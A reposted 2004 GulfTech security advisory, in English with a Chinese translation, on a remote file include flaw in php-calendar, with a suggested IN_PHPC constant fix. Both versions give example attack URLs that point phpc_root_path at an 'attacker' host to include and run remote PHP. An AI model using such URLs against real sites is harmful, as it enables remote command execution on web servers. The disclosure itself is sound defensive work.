[转载]php-Calendar File Include Vulnerability (Command Exec)
信息来源:[url]www.securityfocus.com[/url]##########################################################
# GulfTech Security Research December 28th, 2004
##########################################################
# Vendor : Sean Proctor
# URL : [url]http://php-calendar.sourceforge.net/[/url]
# Version : All Versions
# Risk : File Include Vulnerability
##########################################################
Description:
I was searching for a decent calendar which my group at school
could use to keep track of events, etc. We were previously using
localendar, which I didn't like and it had some problems. I found
CST-Calendar which did most of what I wanted, but was rather ugly
and missed some features others in the group wanted. So, I
gradually re-wrote CST-Calendar since that project seems to have
stopped work entirely. [ As quoted from their website ]
File Include Vulnerability:
There is a very dangerous file include vulnerability in
php-calendar, and making the issue even more dangerous is that I
found out about php-calendar from an individual who said that
php-calendar is a great open source calendar to use in php projects,
and is fairly popular amongst open source php developers. This may be
true, but the vulnerabilities need to be fixed if the same conditions
apply as found in the original code. Below are example attack url's
[url]http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/ht[/url]
ml.php
[url]http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.[/url]
php
If php globals are set to on then it is highly probable that an
attacker will be able to include arbitrary php files and thus execute
system commands with the rights of the web server. This can be very
dangerous in some situations.
Solution:
php-calendar has a defined constant to help prevent against stuff
like this. It can be seen in other php-calendar files such as db.php
if ( !defined('IN_PHPC') ) {
die("Hacking attempt");
}
Adding the following to the top of the affected pages should suffice
in preventing the kinds of attacks previously mentioned in this advisory.
Related Info:
The original advisory can be found at the following location
[url]http://www.gulftech.org/?node=research&article_id=00060-12292004[/url]
Credits:
James Bercegay of the GulfTech Security Research Team
--
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.296 / Virus Database: 265.6.6 - Release Date: 12/28/2004 翻译版本
php-Calendar File Include Vulnerability
本文作者: Z.C.Y[B.C.T] 网站:[url]http://www.bnso.net[/url]
文章出处: 原创翻译
阅读次数: 3
发布日期: 2004-12-31
来源:"GulfTech Security" <security () gulftech ! org>
日期: 2004-12-29 14:43:37
##########################################################
# GulfTech Security Research 2004-12-28
##########################################################
# 厂商 : Sean Proctor
# 地址 : [url]http://php-calendar.sourceforge.net/[/url]
# 版本 : 所有版本
# 危害 : 文件包含漏洞
##########################################################
描述:组织为了可以记录一些事件,我已经花了相当多的时间寻找一个网络日志程序。以前我们曾用过
localendar,但是我不喜欢,并且它也有很多问题。后然我发现了CST-Calendar,它拥有很
多我想要的功能,但是界面相当难看,并且没有我们组织想要的一些其他功能。因此,当这
个项目已经完全停止运行,我就重写CST-Calendar。
文件包含漏洞:
php-calendar存在一个非常危险的文件包含漏洞,事这个问题更危险的是,我找到关于
php-calendar生产的企业的声明,他们说php-calendar是一个完全开放源码的用于PHP项目的日历,
并且php-calendar在开源PHP开发者中是相当受欢迎的。这可能是真的,但是假如相同状况在原
代码内发现,那么这个漏洞需要去修复。
下面是攻击网站的例子:
[url]http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php[/url]
[url]http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php[/url]
假如php globals设置为ON,那么就很可能被攻击者包含任意的PHP文件,并因此获得
网站服务器的系统权限。在某种形式上说是非常危险。
解决办法:php-calendar的defined常量可以帮助防止这个漏洞。
我们可以看到在其他的php-calendar的文件中如db.php
if ( !defined('IN_PHPC') ) {
die("Hacking attempt");
}
把这个加到受影响的页面的顶部就足够阻止上面提到的攻击了。
相关信息:
原始咨询在下面地址可以找到
[url]http://www.gulftech.org/?node=research&article_id=00060-12292004[/url]
漏洞发现:
James Bercegay of the GulfTech Security Research Team
页:
[1]